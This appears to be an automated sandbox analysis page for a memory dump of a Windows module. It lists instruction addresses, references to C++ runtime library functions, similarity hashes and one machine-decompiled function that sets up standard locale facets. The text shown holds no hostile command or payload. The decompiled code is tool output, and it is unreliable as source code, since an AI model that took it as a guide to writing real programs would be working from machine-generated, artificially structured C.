0x6e1cf635
0x6e1cf63a
0x6e1cf643
0x6e1cf645
0x6e1cf647
0x6e1cf68c
0x6e1cf68f
0x6e1cf69b
0x6e1cf649
0x6e1cf649
0x6e1cf64b
0x6e1cf651
0x6e1cf657
0x6e1cf65f
0x6e1cf662
0x6e1cf69f
0x6e1cf6ad
0x6e1cf6b2
0x6e1cf6ba
0x6e1cf6c4
0x6e1cf6c9
0x6e1cf6d4
0x6e1cf6d8
0x6e1cf6db
0x6e1cf6e0
0x6e1cf6e9
0x6e1cf6eb
0x6e1cf6ed
0x6e1cf732
0x6e1cf735
0x6e1cf741
0x6e1cf6ef
0x6e1cf6ef
0x6e1cf6f1
0x6e1cf6f7
0x6e1cf6fd
0x6e1cf705
0x6e1cf708
0x6e1cf745
0x6e1cf753
0x6e1cf758
0x6e1cf760
0x6e1cf76a
0x6e1cf76f
0x6e1cf77a
0x6e1cf77e
0x6e1cf781
0x6e1cf786
0x6e1cf78f
0x6e1cf791
0x6e1cf793
0x6e1cf7d8
0x6e1cf7db
0x6e1cf7e7
0x6e1cf795
0x6e1cf795
0x6e1cf797
0x6e1cf79d
0x6e1cf7a3
0x6e1cf7ab
0x6e1cf7ae
0x6e1cf7eb
0x6e1cf7f9
0x6e1cf7fe
0x6e1cf806
0x6e1cf810
0x6e1cf815
0x6e1cf820
0x6e1cf824
0x6e1cf827
0x6e1cf82c
0x6e1cf835
0x6e1cf837
0x6e1cf839
0x6e1cf87e
0x6e1cf881
0x6e1cf88d
0x6e1cf83b
0x6e1cf83b
0x6e1cf83d
0x6e1cf843
0x6e1cf849
0x6e1cf851
0x6e1cf854
0x6e1cf891
0x6e1cf89f
0x6e1cf8a4
0x6e1cf8ac
0x6e1cf8b6
0x6e1cf8bb
0x6e1cf8c6
0x6e1cf8ca
0x6e1cf8cd
0x6e1cf8d2
0x6e1cf8db
0x6e1cf8dd
0x6e1cf8df
0x6e1cf924
0x6e1cf927
0x6e1cf933
0x6e1cf8e1
0x6e1cf8e1
0x6e1cf8e3
0x6e1cf8e9
0x6e1cf8ef
0x6e1cf8f7
0x6e1cf8fa
0x6e1cf937
0x6e1cf945
0x6e1cf94a
0x6e1cf952
0x6e1cf95c
0x6e1cf961
0x6e1cf96c
0x6e1cf970
0x6e1cf973
0x6e1cf978
0x6e1cf981
0x6e1cf983
0x6e1cf985
0x6e1cf9ca
0x6e1cf9cd
0x6e1cf9d9
0x6e1cf987
0x6e1cf987
0x6e1cf989
0x6e1cf98f
0x6e1cf995
0x6e1cf99d
0x6e1cf9a0
0x6e1cf9dd
0x6e1cf9eb
0x6e1cf9f0
0x6e1cf9f8
0x6e1cfa02
0x6e1cfa07
0x6e1cfa12
0x6e1cfa16
0x6e1cfa19
0x6e1cfa1e
0x6e1cfa27
0x6e1cfa29
0x6e1cfa2b
0x6e1cfa70
0x6e1cfa73
0x6e1cfa7f
0x6e1cfa2d
0x6e1cfa2d
0x6e1cfa2f
0x6e1cfa35
0x6e1cfa3b
0x6e1cfa43
0x6e1cfa46
0x6e1cfa83
0x6e1cfa91
0x6e1cfa96
0x6e1cfa9e
0x6e1cfaa8
0x6e1cfaad
0x6e1cfab8
0x6e1cfabc
0x6e1cfabf
0x6e1cfac4
0x6e1cfacd
0x6e1cfacf
0x6e1cfad1
0x6e1cfb16
0x6e1cfb19
0x6e1cfb25
0x6e1cfad3
0x6e1cfad3
0x6e1cfad5
0x6e1cfadb
0x6e1cfae1
0x6e1cfae9
0x6e1cfaec
0x6e1cfb29
0x6e1cfb37
0x6e1cfb3c
0x6e1cfb44
0x6e1cfb4e
0x6e1cfb53
0x6e1cfb5e
0x6e1cfb62
0x6e1cfb65
0x6e1cfb6a
0x6e1cfb73
0x6e1cfb75
0x6e1cfb77
0x6e1cfbbc
0x6e1cfbbf
0x6e1cfbcb
0x6e1cfb79
0x6e1cfb79
0x6e1cfb7b
0x6e1cfb81
0x6e1cfb87
0x6e1cfb8f
0x6e1cfb92
0x6e1cfbcf
0x6e1cfbdd
0x6e1cfbe2
0x6e1cfbea
0x6e1cfbf4
0x6e1cfbf9
0x6e1cfc04
0x6e1cfc08
0x6e1cfc0b
0x6e1cfc10
0x6e1cfc19
0x6e1cfc1b
0x6e1cfc1d
0x6e1cfc62
0x6e1cfc65
0x6e1cfc71
0x6e1cfc1f
0x6e1cfc1f
0x6e1cfc21
0x6e1cfc27
0x6e1cfc2d
0x6e1cfc35
0x6e1cfc38
0x6e1cfc75
0x6e1cfc83
0x6e1cfc88
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcbf
0x6e1cfcc1
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7
0x6e1cfc3a
0x6e1cfc3a
0x6e1cfc3d
0x6e1cfc41
0x6e1cfc45
0x6e1cfc52
0x6e1cfc5a
0x6e1cfc5c
0x00000000
0x6e1cfc5c
0x6e1cfc23
0x6e1cfc23
0x00000000
0x6e1cfc23
0x6e1cfc21
0x6e1cfb94
0x6e1cfb94
0x6e1cfb97
0x6e1cfb9b
0x6e1cfb9f
0x6e1cfbac
0x6e1cfbb4
0x6e1cfbb6
0x00000000
0x6e1cfbb6
0x6e1cfb7d
0x6e1cfb7d
0x00000000
0x6e1cfb7d
0x6e1cfb7b
0x6e1cfaee
0x6e1cfaee
0x6e1cfaf1
0x6e1cfaf5
0x6e1cfaf9
0x6e1cfb06
0x6e1cfb0e
0x6e1cfb10
0x00000000
0x6e1cfb10
0x6e1cfad7
0x6e1cfad7
0x00000000
0x6e1cfad7
0x6e1cfad5
0x6e1cfa48
0x6e1cfa48
0x6e1cfa4b
0x6e1cfa4f
0x6e1cfa53
0x6e1cfa60
0x6e1cfa68
0x6e1cfa6a
0x00000000
0x6e1cfa6a
0x6e1cfa31
0x6e1cfa31
0x00000000
0x6e1cfa31
0x6e1cfa2f
0x6e1cf9a2
0x6e1cf9a2
0x6e1cf9a5
0x6e1cf9a9
0x6e1cf9ad
0x6e1cf9ba
0x6e1cf9c2
0x6e1cf9c4
0x00000000
0x6e1cf9c4
0x6e1cf98b
0x6e1cf98b
0x00000000
0x6e1cf98b
0x6e1cf989
0x6e1cf8fc
0x6e1cf8fc
0x6e1cf8ff
0x6e1cf903
0x6e1cf907
0x6e1cf914
0x6e1cf91c
0x6e1cf91e
0x00000000
0x6e1cf91e
0x6e1cf8e5
0x6e1cf8e5
0x00000000
0x6e1cf8e5
0x6e1cf8e3
0x6e1cf856
0x6e1cf856
0x6e1cf859
0x6e1cf85d
0x6e1cf861
0x6e1cf86e
0x6e1cf876
0x6e1cf878
0x00000000
0x6e1cf878
0x6e1cf83f
0x6e1cf83f
0x00000000
0x6e1cf83f
0x6e1cf83d
0x6e1cf7b0
0x6e1cf7b0
0x6e1cf7b3
0x6e1cf7b7
0x6e1cf7bb
0x6e1cf7c8
0x6e1cf7d0
0x6e1cf7d2
0x00000000
0x6e1cf7d2
0x6e1cf799
0x6e1cf799
0x00000000
0x6e1cf799
0x6e1cf797
0x6e1cf70a
0x6e1cf70a
0x6e1cf70d
0x6e1cf711
0x6e1cf715
0x6e1cf722
0x6e1cf72a
0x6e1cf72c
0x00000000
0x6e1cf72c
0x6e1cf6f3
0x6e1cf6f3
0x00000000
0x6e1cf6f3
0x6e1cf6f1
0x6e1cf664
0x6e1cf664
0x6e1cf667
0x6e1cf66b
0x6e1cf66f
0x6e1cf67c
0x6e1cf684
0x6e1cf686
0x00000000
0x6e1cf686
0x6e1cf64d
0x6e1cf64d
0x00000000
0x6e1cf64d
0x6e1cf64b
0x6e1cf5be
0x6e1cf5be
0x6e1cf5c1
0x6e1cf5c5
0x6e1cf5c9
0x6e1cf5d6
0x6e1cf5de
0x6e1cf5e0
0x00000000
0x6e1cf5e0
0x6e1cf5a7
0x6e1cf5a7
0x00000000
0x6e1cf5a7
0x6e1cf5a5
0x6e1cf518
0x6e1cf518
0x6e1cf51b
0x6e1cf51f
0x6e1cf523
0x6e1cf530
0x6e1cf538
0x6e1cf53a
0x00000000
0x6e1cf53a
0x6e1cf501
0x6e1cf501
0x00000000
0x6e1cf501
0x6e1cf4ff
0x6e1cf472
0x6e1cf472
0x6e1cf475
0x6e1cf479
0x6e1cf47d
0x6e1cf48a
0x6e1cf492
0x6e1cf494
0x00000000
0x6e1cf494
0x6e1cf45b
0x6e1cf45b
0x00000000
0x6e1cf45b
0x6e1cf459
0x6e1cf3cc
0x6e1cf3cc
0x6e1cf3cf
0x6e1cf3d3
0x6e1cf3d7
0x6e1cf3e4
0x6e1cf3ec
0x6e1cf3ee
0x00000000
0x6e1cf3ee
0x6e1cf3b5
0x6e1cf3b5
0x00000000
0x6e1cf3b5
0x6e1cf3b3
0x6e1cf326
0x6e1cf326
0x6e1cf329
0x6e1cf32d
0x6e1cf331
0x6e1cf33e
0x6e1cf346
0x6e1cf348
0x00000000
0x6e1cf348
0x6e1cf30f
0x6e1cf30f
0x00000000
0x6e1cf30f
0x6e1cf30d
0x6e1cf280
0x6e1cf280
0x6e1cf283
0x6e1cf287
0x6e1cf28b
0x6e1cf298
0x6e1cf2a0
0x6e1cf2a2
0x00000000
0x6e1cf2a2
0x6e1cf269
0x6e1cf269
0x00000000
0x6e1cf269
0x6e1cf267
0x6e1cf1da
0x6e1cf1da
0x6e1cf1dd
0x6e1cf1e1
0x6e1cf1e5
0x6e1cf1f2
0x6e1cf1fa
0x6e1cf1fc
0x00000000
0x6e1cf1fc
0x6e1cf1c3
0x6e1cf1c3
0x00000000
0x6e1cf1c3
0x6e1cf1c1
0x6e1cf134
0x6e1cf134
0x6e1cf137
0x6e1cf13b
0x6e1cf13f
0x6e1cf14c
0x6e1cf154
0x6e1cf156
0x00000000
0x6e1cf156
0x6e1cf11d
0x6e1cf11d
0x00000000
0x6e1cf11d
0x6e1cf11b
0x6e1cf08e
0x6e1cf08e
0x6e1cf091
0x6e1cf095
0x6e1cf099
0x6e1cf0a6
0x6e1cf0ae
0x6e1cf0b0
0x00000000
0x6e1cf0b0
0x6e1cf077
0x6e1cf077
0x00000000
0x6e1cf077
0x6e1cf075
0x6e1cefe8
0x6e1cefe8
0x6e1cefeb
0x6e1cefef
0x6e1ceff3
0x6e1cf000
0x6e1cf008
0x6e1cf00a
0x00000000
0x6e1cf00a
0x6e1cefd1
0x6e1cefd1
0x00000000
0x6e1cefd1
0x6e1cefcf
0x6e1cef42
0x6e1cef42
0x6e1cef45
0x6e1cef49
0x6e1cef4d
0x6e1cef5a
0x6e1cef62
0x6e1cef64
0x00000000
0x6e1cef64
0x6e1cef2b
0x6e1cef2b
0x00000000
0x6e1cef2b
0x6e1cef29

APIs

__EH_prolog3.LIBCMT ref: 6E1CEEF2
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CEEFC
int.LIBCPMT ref: 6E1CEF13

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

codecvt.LIBCPMT ref: 6E1CEF36
std::_Facet_Register.LIBCPMT ref: 6E1CEF4D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CEF6D
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CEF8B

Strings

0k(n, xrefs: 6E1CEF07

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: 0k(n
API String ID: 2594415655-1656414601
Opcode ID: b10d0f690c0b2f7a685d39a62aa587796238668072990ed8f3ae1ffc3187c861
Instruction ID: aef53a23d998b24e4ae2cb3cfea3f7f9e8a4c4e67e5b70a9c63103f4c7b100a0
Opcode Fuzzy Hash: b10d0f690c0b2f7a685d39a62aa587796238668072990ed8f3ae1ffc3187c861
Instruction Fuzzy Hash: EA113675920519CBCF01EBE4C854AFEB77ABF64B14F140908E420E7290DF789E84EB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF759, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF759(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t139;
				signed int _t140;
				void* _t152;
				void* _t165;
				void* _t178;
				void* _t191;
				void* _t204;
				void* _t217;
				void* _t230;
				void* _t243;
				signed int _t359;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				void* _t418;

				_t387 = __edx;
				_t296 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t418 - 0x14, 0);
				_t399 =  *0x6e286dc4; // 0x0
				 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
				 *(_t418 - 0x10) = _t399;
				_t139 = E6E1A161C(0x6e286d78);
				_t299 =  *((intOrPtr*)(_t418 + 8));
				_t140 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t139);
				_t389 = _t140;
				if(_t140 != 0) {
					L5:
					E6E1C66BA(_t418 - 0x14);
					return E6E1E0075(_t389);
				} else {
					if(_t399 == 0) {
						_push( *((intOrPtr*)(_t418 + 8)));
						_push(_t418 - 0x10);
						__eflags = E6E1D12B4(__ebx, _t299, __edx, _t389, _t399) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t418 - 0x20);
							E6E1E3D74(_t418 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t389, _t399, 0x14);
							E6E1C6653(_t418 - 0x14, 0);
							_t400 =  *0x6e286dd8; // 0x0
							 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
							 *(_t418 - 0x10) = _t400;
							_t152 = E6E1A161C(0x6e286d84);
							_t306 =  *((intOrPtr*)(_t418 + 8));
							_t390 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t152);
							__eflags = _t390;
							if(_t390 != 0) {
								L12:
								E6E1C66BA(_t418 - 0x14);
								return E6E1E0075(_t390);
							} else {
								__eflags = _t400;
								if(_t400 == 0) {
									_push( *((intOrPtr*)(_t418 + 8)));
									_push(_t418 - 0x10);
									__eflags = E6E1D1339(_t296, _t306, __edx, _t390, _t400) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t418 - 0x20);
										E6E1E3D74(_t418 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t296, _t390, _t400, 0x14);
										E6E1C6653(_t418 - 0x14, 0);
										_t401 =  *0x6e286db0; // 0x0
										 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
										 *(_t418 - 0x10) = _t401;
										_t165 = E6E1A161C(0x6e286d64);
										_t313 =  *((intOrPtr*)(_t418 + 8));
										_t391 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t165);
										__eflags = _t391;
										if(_t391 != 0) {
											L19:
											E6E1C66BA(_t418 - 0x14);
											return E6E1E0075(_t391);
										} else {
											__eflags = _t401;
											if(_t401 == 0) {
												_push( *((intOrPtr*)(_t418 + 8)));
												_push(_t418 - 0x10);
												__eflags = E6E1D13A1(_t296, _t313, __edx, _t391, _t401) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t418 - 0x20);
													E6E1E3D74(_t418 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t296, _t391, _t401, 0x14);
													E6E1C6653(_t418 - 0x14, 0);
													_t402 =  *0x6e286ddc; // 0x0
													 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
													 *(_t418 - 0x10) = _t402;
													_t178 = E6E1A161C(0x6e286d88);
													_t320 =  *((intOrPtr*)(_t418 + 8));
													_t392 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t178);
													__eflags = _t392;
													if(_t392 != 0) {
														L26:
														E6E1C66BA(_t418 - 0x14);
														return E6E1E0075(_t392);
													} else {
														__eflags = _t402;
														if(_t402 == 0) {
															_push( *((intOrPtr*)(_t418 + 8)));
															_push(_t418 - 0x10);
															__eflags = E6E1D1409(_t296, _t320, _t387, _t392, _t402) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t418 - 0x20);
																E6E1E3D74(_t418 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t296, _t392, _t402, 0x14);
																E6E1C6653(_t418 - 0x14, 0);
																_t403 =  *0x6e286de0; // 0x0
																 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																 *(_t418 - 0x10) = _t403;
																_t191 = E6E1A161C(0x6e286d8c);
																_t327 =  *((intOrPtr*)(_t418 + 8));
																_t393 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t191);
																__eflags = _t393;
																if(_t393 != 0) {
																	L33:
																	E6E1C66BA(_t418 - 0x14);
																	return E6E1E0075(_t393);
																} else {
																	__eflags = _t403;
																	if(_t403 == 0) {
																		_push( *((intOrPtr*)(_t418 + 8)));
																		_push(_t418 - 0x10);
																		__eflags = E6E1D1471(_t296, _t327, _t387, _t393, _t403) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t418 - 0x20);
																			E6E1E3D74(_t418 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t296, _t393, _t403, 0x14);
																			E6E1C6653(_t418 - 0x14, 0);
																			_t404 =  *0x6e286dfc; // 0x0
																			 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																			 *(_t418 - 0x10) = _t404;
																			_t204 = E6E1A161C(0x6e286da8);
																			_t334 =  *((intOrPtr*)(_t418 + 8));
																			_t394 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t204);
																			__eflags = _t394;
																			if(_t394 != 0) {
																				L40:
																				E6E1C66BA(_t418 - 0x14);
																				return E6E1E0075(_t394);
																			} else {
																				__eflags = _t404;
																				if(_t404 == 0) {
																					_push( *((intOrPtr*)(_t418 + 8)));
																					_push(_t418 - 0x10);
																					__eflags = E6E1D14EC(_t296, _t334, _t387, _t394, _t404) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t418 - 0x20);
																						E6E1E3D74(_t418 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t296, _t394, _t404, 0x14);
																						E6E1C6653(_t418 - 0x14, 0);
																						_t405 =  *0x6e286dcc; // 0x0
																						 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																						 *(_t418 - 0x10) = _t405;
																						_t217 = E6E1A161C(0x6e286d80);
																						_t341 =  *((intOrPtr*)(_t418 + 8));
																						_t395 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t217);
																						__eflags = _t395;
																						if(_t395 != 0) {
																							L47:
																							E6E1C66BA(_t418 - 0x14);
																							return E6E1E0075(_t395);
																						} else {
																							__eflags = _t405;
																							if(_t405 == 0) {
																								_push( *((intOrPtr*)(_t418 + 8)));
																								_push(_t418 - 0x10);
																								__eflags = E6E1D1558(_t296, _t341, _t387, _t395, _t405) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t418 - 0x20);
																									E6E1E3D74(_t418 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t296, _t395, _t405, 0x14);
																									E6E1C6653(_t418 - 0x14, 0);
																									_t406 =  *0x6e286e00; // 0x0
																									 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																									 *(_t418 - 0x10) = _t406;
																									_t230 = E6E1A161C(0x6e286dac);
																									_t348 =  *((intOrPtr*)(_t418 + 8));
																									_t396 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t230);
																									__eflags = _t396;
																									if(_t396 != 0) {
																										L54:
																										E6E1C66BA(_t418 - 0x14);
																										return E6E1E0075(_t396);
																									} else {
																										__eflags = _t406;
																										if(_t406 == 0) {
																											_push( *((intOrPtr*)(_t418 + 8)));
																											_push(_t418 - 0x10);
																											__eflags = E6E1D15C4(_t296, _t348, _t387, _t396, _t406) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t418 - 0x20);
																												E6E1E3D74(_t418 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t296, _t396, _t406, 0x14);
																												E6E1C6653(_t418 - 0x14, 0);
																												_t407 =  *0x6e286dd0; // 0x0
																												 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																												 *(_t418 - 0x10) = _t407;
																												_t243 = E6E1A161C(0x6e286d60);
																												_t355 =  *((intOrPtr*)(_t418 + 8));
																												_t397 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t243);
																												__eflags = _t397;
																												if(_t397 != 0) {
																													L61:
																													E6E1C66BA(_t418 - 0x14);
																													return E6E1E0075(_t397);
																												} else {
																													__eflags = _t407;
																													if(_t407 == 0) {
																														_push( *((intOrPtr*)(_t418 + 8)));
																														_push(_t418 - 0x10);
																														__eflags = E6E1D162A(_t296, _t355, _t387, _t397, _t407) - 0xffffffff;
																														if(__eflags == 0) {
																															_t359 = _t418 - 0x20;
																															E6E1A1438(_t359);
																															E6E1E3D74(_t418 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e22851f, _t296, _t397, _t407, 4);
																															_t408 = _t359;
																															 *(_t418 - 0x10) = _t408;
																															 *((intOrPtr*)(_t408 + 4)) =  *((intOrPtr*)(_t418 + 0xc));
																															_push( *((intOrPtr*)(_t418 + 0x14)));
																															_t133 = _t418 - 4;
																															 *_t133 =  *(_t418 - 4) & 0x00000000;
																															__eflags =  *_t133;
																															 *_t408 = 0x6e22c0c4;
																															 *((char*)(_t408 + 0x28)) =  *((intOrPtr*)(_t418 + 0x10));
																															E6E1D542F(_t296, _t359, _t387, _t397, _t408,  *_t133);
																															return E6E1E0075(_t408,  *((intOrPtr*)(_t418 + 8)));
																														} else {
																															_t397 =  *(_t418 - 0x10);
																															 *(_t418 - 0x10) = _t397;
																															 *(_t418 - 4) = 1;
																															E6E1C6FD3(__eflags, _t397);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t397 + 4))))();
																															 *0x6e286dd0 = _t397;
																															goto L61;
																														}
																													} else {
																														_t397 = _t407;
																														goto L61;
																													}
																												}
																											} else {
																												_t396 =  *(_t418 - 0x10);
																												 *(_t418 - 0x10) = _t396;
																												 *(_t418 - 4) = 1;
																												E6E1C6FD3(__eflags, _t396);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t396 + 4))))();
																												 *0x6e286e00 = _t396;
																												goto L54;
																											}
																										} else {
																											_t396 = _t406;
																											goto L54;
																										}
																									}
																								} else {
																									_t395 =  *(_t418 - 0x10);
																									 *(_t418 - 0x10) = _t395;
																									 *(_t418 - 4) = 1;
																									E6E1C6FD3(__eflags, _t395);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t395 + 4))))();
																									 *0x6e286dcc = _t395;
																									goto L47;
																								}
																							} else {
																								_t395 = _t405;
																								goto L47;
																							}
																						}
																					} else {
																						_t394 =  *(_t418 - 0x10);
																						 *(_t418 - 0x10) = _t394;
																						 *(_t418 - 4) = 1;
																						E6E1C6FD3(__eflags, _t394);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t394 + 4))))();
																						 *0x6e286dfc = _t394;
																						goto L40;
																					}
																				} else {
																					_t394 = _t404;
																					goto L40;
																				}
																			}
																		} else {
																			_t393 =  *(_t418 - 0x10);
																			 *(_t418 - 0x10) = _t393;
																			 *(_t418 - 4) = 1;
																			E6E1C6FD3(__eflags, _t393);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t393 + 4))))();
																			 *0x6e286de0 = _t393;
																			goto L33;
																		}
																	} else {
																		_t393 = _t403;
																		goto L33;
																	}
																}
															} else {
																_t392 =  *(_t418 - 0x10);
																 *(_t418 - 0x10) = _t392;
																 *(_t418 - 4) = 1;
																E6E1C6FD3(__eflags, _t392);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t392 + 4))))();
																 *0x6e286ddc = _t392;
																goto L26;
															}
														} else {
															_t392 = _t402;
															goto L26;
														}
													}
												} else {
													_t391 =  *(_t418 - 0x10);
													 *(_t418 - 0x10) = _t391;
													 *(_t418 - 4) = 1;
													E6E1C6FD3(__eflags, _t391);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t391 + 4))))();
													 *0x6e286db0 = _t391;
													goto L19;
												}
											} else {
												_t391 = _t401;
												goto L19;
											}
										}
									} else {
										_t390 =  *(_t418 - 0x10);
										 *(_t418 - 0x10) = _t390;
										 *(_t418 - 4) = 1;
										E6E1C6FD3(__eflags, _t390);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t390 + 4))))();
										 *0x6e286dd8 = _t390;
										goto L12;
									}
								} else {
									_t390 = _t400;
									goto L12;
								}
							}
						} else {
							_t389 =  *(_t418 - 0x10);
							 *(_t418 - 0x10) = _t389;
							 *(_t418 - 4) = 1;
							E6E1C6FD3(__eflags, _t389);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t389 + 4))))();
							 *0x6e286dc4 = _t389;
							goto L5;
						}
					} else {
						_t389 = _t399;
						goto L5;
					}
				}
			}

0x6e1cf759
0x6e1cf759
0x6e1cf760
0x6e1cf76a
0x6e1cf76f
0x6e1cf77a
0x6e1cf77e
0x6e1cf781
0x6e1cf786
0x6e1cf78a
0x6e1cf78f
0x6e1cf793
0x6e1cf7d8
0x6e1cf7db
0x6e1cf7e7
0x6e1cf795
0x6e1cf797
0x6e1cf79d
0x6e1cf7a3
0x6e1cf7ab
0x6e1cf7ae
0x6e1cf7eb
0x6e1cf7f9
0x6e1cf7fe
0x6e1cf806
0x6e1cf810
0x6e1cf815
0x6e1cf820
0x6e1cf824
0x6e1cf827
0x6e1cf82c
0x6e1cf835
0x6e1cf837
0x6e1cf839
0x6e1cf87e
0x6e1cf881
0x6e1cf88d
0x6e1cf83b
0x6e1cf83b
0x6e1cf83d
0x6e1cf843
0x6e1cf849
0x6e1cf851
0x6e1cf854
0x6e1cf891
0x6e1cf89f
0x6e1cf8a4
0x6e1cf8ac
0x6e1cf8b6
0x6e1cf8bb
0x6e1cf8c6
0x6e1cf8ca
0x6e1cf8cd
0x6e1cf8d2
0x6e1cf8db
0x6e1cf8dd
0x6e1cf8df
0x6e1cf924
0x6e1cf927
0x6e1cf933
0x6e1cf8e1
0x6e1cf8e1
0x6e1cf8e3
0x6e1cf8e9
0x6e1cf8ef
0x6e1cf8f7
0x6e1cf8fa
0x6e1cf937
0x6e1cf945
0x6e1cf94a
0x6e1cf952
0x6e1cf95c
0x6e1cf961
0x6e1cf96c
0x6e1cf970
0x6e1cf973
0x6e1cf978
0x6e1cf981
0x6e1cf983
0x6e1cf985
0x6e1cf9ca
0x6e1cf9cd
0x6e1cf9d9
0x6e1cf987
0x6e1cf987
0x6e1cf989
0x6e1cf98f
0x6e1cf995
0x6e1cf99d
0x6e1cf9a0
0x6e1cf9dd
0x6e1cf9eb
0x6e1cf9f0
0x6e1cf9f8
0x6e1cfa02
0x6e1cfa07
0x6e1cfa12
0x6e1cfa16
0x6e1cfa19
0x6e1cfa1e
0x6e1cfa27
0x6e1cfa29
0x6e1cfa2b
0x6e1cfa70
0x6e1cfa73
0x6e1cfa7f
0x6e1cfa2d
0x6e1cfa2d
0x6e1cfa2f
0x6e1cfa35
0x6e1cfa3b
0x6e1cfa43
0x6e1cfa46
0x6e1cfa83
0x6e1cfa91
0x6e1cfa96
0x6e1cfa9e
0x6e1cfaa8
0x6e1cfaad
0x6e1cfab8
0x6e1cfabc
0x6e1cfabf
0x6e1cfac4
0x6e1cfacd
0x6e1cfacf
0x6e1cfad1
0x6e1cfb16
0x6e1cfb19
0x6e1cfb25
0x6e1cfad3
0x6e1cfad3
0x6e1cfad5
0x6e1cfadb
0x6e1cfae1
0x6e1cfae9
0x6e1cfaec
0x6e1cfb29
0x6e1cfb37
0x6e1cfb3c
